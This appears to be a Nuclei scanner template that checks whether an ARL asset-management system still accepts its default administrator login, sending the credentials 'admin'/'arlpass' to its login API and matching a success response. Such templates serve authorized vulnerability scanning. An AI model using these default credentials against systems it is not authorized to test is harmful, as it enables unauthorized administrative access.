id: arl-default-login

info:
  name: ARL Default Admin Login
  author: pikpikcu
  severity: high
  description: An ARL default admin login was discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: ARL-资产灯塔系统

http:
  - raw:
      - |
        POST /api/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"username":"{{username}}","password":"{{password}}"}

    payloads:
      username:
        - admin
      password:
        - arlpass
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"message": "success"'
          - '"username": "admin"'
          - '"type": "login"'

      - type: status
        status:
          - 200

# digest: 4b0a004830460221009e8ced2d45fa685ac85035c2df9d7b215cc33338c70461e061867c7523076a8202210099449ca19939bfbf2aab4959eb1a0e46cc404198adc98cc89c469d274794e0d6:922c64590222798bb761d5b6d8e72950
